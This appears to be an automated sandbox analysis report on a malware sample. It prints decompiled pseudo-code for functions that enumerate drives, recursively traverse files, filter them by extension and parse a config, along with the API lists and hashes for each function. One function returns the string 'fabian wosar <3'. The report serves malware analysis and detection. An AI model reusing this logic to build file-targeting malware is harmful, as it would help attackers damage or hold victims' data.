0x0f1d6e40
0x0f1d6e48
0x0f1d6e56
0x0f1d6e6b
0x0f1d6e7b
0x0f1d6e83

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F1D6DF9
wsprintfW.USER32 ref: 0F1D6E0E
InitializeCriticalSection.KERNEL32(?), ref: 0F1D6E1C
VirtualAlloc.KERNEL32 ref: 0F1D6E50

Part of subcall function 0F1D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F1D6CC3
Part of subcall function 0F1D6C90: lstrcatW.KERNEL32(00000000,0F1DFEC4), ref: 0F1D6CDB
Part of subcall function 0F1D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F1D6CE5

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F1D6E7B
ExitThread.KERNEL32 ref: 0F1D6E83

Strings

%c:\, xrefs: 0F1D6E08

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: f63b9deaced23d093cc7378c9022150206da48a05f36a91a6dbf869e2ce946e1
Instruction ID: aaedff6349398002d598b55c4dd261c5b04314f2acd27df80fb3c80e0f1d16ce
Opcode Fuzzy Hash: f63b9deaced23d093cc7378c9022150206da48a05f36a91a6dbf869e2ce946e1
Instruction Fuzzy Hash: C70184B5245300BBE7109F54CC8AF167BBCAF44B21F004614FB65991C2D7B8A554CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F1D6850(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xf1e2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xf1e2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

0x0f1d6853
0x0f1d685c
0x0f1d685e
0x0f1d6872
0x0f1d6877
0x0f1d687c
0x0f1d6890
0x0f1d689a
0x0f1d6880
0x0f1d6880
0x0f1d6886
0x0f1d6889
0x0f1d688a
0x00000000
0x00000000
0x00000000
0x0f1d688a
0x0f1d688e
0x0f1d68b7
0x0f1d68bf
0x0f1d68c5
0x0f1d68cb
0x0f1d68d0
0x0f1d68d6
0x0f1d6922
0x0f1d6929
0x0f1d692c
0x0f1d68d8
0x0f1d68d8
0x0f1d68de
0x0f1d68e2
0x0f1d68e4
0x0f1d68e4
0x0f1d68e9
0x0f1d6909
0x0f1d690d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d68eb
0x0f1d68f0
0x0f1d68f0
0x0f1d68f6
0x00000000
0x00000000
0x0f1d68fc
0x0f1d68fe
0x00000000
0x0f1d6900
0x0f1d6900
0x0f1d6907
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d6907
0x00000000
0x0f1d68fe
0x0f1d6920
0x0f1d6920
0x00000000
0x0f1d6920
0x00000000
0x0f1d690f
0x0f1d690f
0x0f1d6913
0x0f1d6916
0x0f1d6919
0x0f1d691e
0x0f1d68de
0x0f1d692f
0x0f1d6937
0x0f1d6946
0x00000000
0x00000000
0x00000000
0x0f1d688e
0x0f1d6860
0x0f1d6869
0x0f1d6869

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F1D698A), ref: 0F1D6872

Strings

%s , xrefs: 0F1D68B9

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: afe06746d237471de31d6eee9f817ae1881b183aa1198eb321f7f93ef947dbe9
Instruction ID: 10e6d1bdc30c7603a5aaa1c29ab5fc4379147c1de019819be5ca7919224ed963
Opcode Fuzzy Hash: afe06746d237471de31d6eee9f817ae1881b183aa1198eb321f7f93ef947dbe9
Instruction Fuzzy Hash: FA212772A013289BD7349B2DAC503F673FCEFC4325F854126FD459B582E7B96DA08290

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6D09 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0F1D6D09() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0F1D6950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0F1D6C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x0f1d6d10
0x0f1d6d24
0x0f1d6d48
0x0f1d6d51
0x0f1d6d82
0x0f1d6d8d
0x0f1d6d8f
0x0f1d6d92
0x0f1d6d95
0x0f1d6d97
0x0f1d6da0
0x0f1d6da0
0x0f1d6da3
0x0f1d6da3
0x0f1d6d99
0x0f1d6d9c
0x0f1d6d9e
0x00000000
0x00000000
0x0f1d6d9e
0x0f1d6d97
0x0f1d6d53
0x0f1d6d67
0x0f1d6d6c
0x0f1d6db0
0x0f1d6db0
0x0f1d6dc3
0x0f1d6dce
0x0f1d6ddc

APIs

lstrcmpW.KERNEL32(?,0F1DFEC8,?,?), ref: 0F1D6D1C
lstrcmpW.KERNEL32(?,0F1DFECC,?,?), ref: 0F1D6D36
lstrcatW.KERNEL32(00000000,?), ref: 0F1D6D48
lstrcatW.KERNEL32(00000000,0F1DFEFC), ref: 0F1D6D59

Part of subcall function 0F1D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F1D6CC3
Part of subcall function 0F1D6C90: lstrcatW.KERNEL32(00000000,0F1DFEC4), ref: 0F1D6CDB
Part of subcall function 0F1D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F1D6CE5

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F1D6DBD
FindClose.KERNEL32(00003000,?,?), ref: 0F1D6DCE

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 24ef4c9c905ebcce73f7c0ec80170d725cc8937fedb05a1df2e1891aff8f3293
Instruction ID: 6b0ce10aa0d730c9fe6f6184d4a06d230c67ca6aaa59a455947b7c6ad9edcedc
Opcode Fuzzy Hash: 24ef4c9c905ebcce73f7c0ec80170d725cc8937fedb05a1df2e1891aff8f3293
Instruction Fuzzy Hash: 9B017532A0121DABCF11EF64EC48BEE7BB8EF44701F0040A6F945D5012DB369B61EB61

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D3200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x0f1d3205
0x0f1d3208
0x0f1d320a
0x0f1d320e
0x0f1d321f
0x0f1d321f
0x0f1d3223
0x00000000
0x0f1d3225
0x0f1d3226
0x0f1d322a
0x0f1d3230
0x0f1d3235
0x0f1d3239
0x00000000
0x00000000
0x0f1d323b
0x00000000
0x0f1d3239
0x0f1d3245
0x0f1d3245
0x0f1d3248
0x0f1d3248
0x0f1d324e
0x0f1d3270
0x0f1d3273
0x0f1d3284
0x0f1d328a
0x00000000
0x0f1d328a
0x0f1d3250
0x0f1d3251
0x0f1d3262
0x0f1d3268
0x0f1d328d
0x0f1d328f
0x0f1d3293
0x0f1d3293
0x0f1d328f
0x0f1d3299
0x0f1d32a5
0x0f1d32a5
0x0f1d3210
0x0f1d3210
0x0f1d3214
0x0f1d3217
0x00000000
0x0f1d3219
0x0f1d3219
0x0f1d321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d321d
0x00000000
0x0f1d3217
0x0f1d323e
0x0f1d3242
0x0f1d3242
0x00000000

APIs

lstrlenA.KERNEL32(0F1D52F0,00000000,?,0F1D52F1,?,0F1D34BF,0F1D52F1,00000001,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D3251
GetProcessHeap.KERNEL32(00000008,00000001,?,0F1D34BF,0F1D52F1,00000001,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D325B
HeapAlloc.KERNEL32(00000000,?,0F1D34BF,0F1D52F1,00000001,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D3262
lstrlenA.KERNEL32(0F1D52F0,00000000,?,0F1D52F1,?,0F1D34BF,0F1D52F1,00000001,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D3273
GetProcessHeap.KERNEL32(00000008,00000001,?,0F1D34BF,0F1D52F1,00000001,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D327D
HeapAlloc.KERNEL32(00000000,?,0F1D34BF,0F1D52F1,00000001,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D3284
lstrcpyA.KERNEL32(00000000,0F1D52F0,?,0F1D34BF,0F1D52F1,00000001,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D3293

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 0bce9003426d8e64cddcde998a01aa5a46372e173fad230400688e55f62c9acf
Instruction ID: 985c3ca777e6c2bba016b61872c6e81f697a074d1825061c6b51b09bf7d9c290
Opcode Fuzzy Hash: 0bce9003426d8e64cddcde998a01aa5a46372e173fad230400688e55f62c9acf
Instruction Fuzzy Hash: A111B6318062956EDB214F6898487A6BB7CEF02361F68410DF8E5CB203C739A4B68772

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D33E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F1D33E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0F1D32B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0F1D3320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0F1D3190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0F1D3200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x850f00e8
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x0f1d33e3
0x0f1d33e5
0x0f1d33e9
0x0f1d33eb
0x0f1d33ee
0x0f1d33f1
0x0f1d33f8
0x0f1d34db
0x0f1d34db
0x0f1d3410
0x0f1d3425
0x0f1d342b
0x0f1d342f
0x00000000
0x0f1d3431
0x0f1d3432
0x0f1d3434
0x0f1d343a
0x0f1d3441
0x0f1d3444
0x0f1d344a
0x0f1d344b
0x0f1d34ba
0x0f1d344d
0x0f1d344e
0x0f1d3450
0x0f1d3452
0x0f1d3456
0x0f1d3467
0x0f1d3467
0x0f1d346b
0x0f1d346d
0x0f1d3471
0x0f1d3473
0x0f1d3478
0x0f1d347c
0x00000000
0x00000000
0x0f1d347e
0x00000000
0x0f1d347c
0x0f1d3480
0x0f1d3480
0x0f1d3483
0x0f1d3484
0x0f1d3495
0x0f1d349e
0x0f1d34a3
0x0f1d34a7
0x0f1d34a7
0x0f1d34ad
0x0f1d34b0
0x0f1d34b0
0x00000000
0x0f1d3458
0x0f1d345c
0x0f1d345f
0x00000000
0x0f1d3461
0x0f1d3461
0x0f1d3465
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d3465
0x00000000
0x0f1d345f
0x0f1d3458
0x0f1d3456
0x0f1d344e
0x0f1d344b
0x0f1d3444
0x0f1d34bf
0x0f1d34bf
0x0f1d34bf
0x0f1d34c2
0x0f1d34c3
0x0f1d34d6
0x0f1d34d6
0x0f1d3412
0x0f1d3412
0x0f1d3418
0x0f1d3422
0x0f1d3422

APIs

Part of subcall function 0F1D32B0: lstrlenA.KERNEL32(?,00000000,?,0F1D52F0,?,?,0F1D33F6,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D32C5
Part of subcall function 0F1D32B0: lstrlenA.KERNEL32(?,?,0F1D33F6,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D32EE

lstrlenA.KERNEL32(0F1D52F1,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D3484
GetProcessHeap.KERNEL32(00000008,00000001,?,0F1D52F0,00000000), ref: 0F1D348E
HeapAlloc.KERNEL32(00000000,?,0F1D52F0,00000000), ref: 0F1D3495
lstrcpyA.KERNEL32(00000000,0F1D52F1,?,0F1D52F0,00000000), ref: 0F1D34A7
ExitProcess.KERNEL32 ref: 0F1D34DB

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 5bdb6d7465b5d3d746a750b0576117677dfebef213f537a5999b191590ce221f
Instruction ID: f5d53ed5adee715cbae0609f2692230b910cdbc6daa7a973b286f9d40e219fc8
Opcode Fuzzy Hash: 5bdb6d7465b5d3d746a750b0576117677dfebef213f537a5999b191590ce221f
Instruction Fuzzy Hash: CC3136315042455ADB2B4F2898447F6BBB89F12310F984189F8F5CB283D73D68A7C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D3B20 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0F1D3B72
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F1D3B96
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F1D3B9A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F1D3B9E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F1D3BC5

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: c0b49915270202bb8076c1e369cc34d48aab156a8594ac0b018f852cffa90f41
Instruction ID: 8dee6498d01be7d9bbb37c3a0a3670a4045b10660dc4d88ded67af973ad7aeaa
Opcode Fuzzy Hash: c0b49915270202bb8076c1e369cc34d48aab156a8594ac0b018f852cffa90f41
Instruction Fuzzy Hash: 5A111BB0D4031C6EEB60DF64DC1ABEA7ABCEF08700F008199A648E61C1D7B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D4CD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F1D4CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xf1dfa84]");
				_t16 =  *0xf1dfa8c; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x0f1d4cd6
0x0f1d4cde
0x0f1d4ce4
0x0f1d4ce9
0x0f1d4cec
0x0f1d4cf1
0x0f1d4cf6
0x0f1d4cf9
0x0f1d4d4a
0x0f1d4d4c
0x00000000
0x0f1d4d4e
0x0f1d4d52
0x0f1d4d8f
0x0f1d4d91
0x00000000
0x0f1d4d93
0x0f1d4d9d
0x0f1d4da0
0x0f1d4da0
0x0f1d4da4
0x00000000
0x00000000
0x0f1d4daa
0x0f1d4daa
0x0f1d4dad
0x0f1d4db0
0x0f1d4db0
0x0f1d4db4
0x00000000
0x00000000
0x0f1d4dbe
0x0f1d4dbe
0x00000000
0x0f1d4dba
0x0f1d4dbc
0x00000000
0x00000000
0x0f1d4dc5
0x0f1d4dd4
0x00000000
0x0f1d4dd4
0x0f1d4db0
0x0f1d4d54
0x0f1d4d54
0x0f1d4d58
0x0f1d4d5f
0x0f1d4d61
0x0f1d4d61
0x0f1d4d66
0x0f1d4d7f
0x0f1d4d82
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d4d68
0x0f1d4d68
0x0f1d4d68
0x0f1d4d6c
0x00000000
0x00000000
0x0f1d4d75
0x0f1d4d77
0x00000000
0x0f1d4d79
0x0f1d4d79
0x0f1d4d7d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d4d7d
0x00000000
0x0f1d4d77
0x00000000
0x0f1d4d68
0x00000000
0x0f1d4d84
0x0f1d4d84
0x0f1d4d87
0x0f1d4d88
0x0f1d4d89
0x0f1d4d8d
0x00000000
0x0f1d4d58
0x0f1d4d52
0x0f1d4cfb
0x0f1d4cfb
0x0f1d4cff
0x0f1d4d35
0x0f1d4d49
0x0f1d4d01
0x0f1d4d03
0x0f1d4d05
0x0f1d4d05
0x0f1d4d09
0x0f1d4d27
0x0f1d4d2a
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d4d0b
0x0f1d4d10
0x0f1d4d10
0x0f1d4d14
0x00000000
0x00000000
0x0f1d4d1d
0x0f1d4d1f
0x00000000
0x0f1d4d21
0x0f1d4d21
0x0f1d4d25
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d4d25
0x00000000
0x0f1d4d1f
0x00000000
0x0f1d4d10
0x00000000
0x0f1d4d2c
0x0f1d4d2c
0x0f1d4d2f
0x0f1d4d30
0x0f1d4d31
0x00000000
0x0f1d4d05
0x0f1d4cff
0x00000000

APIs

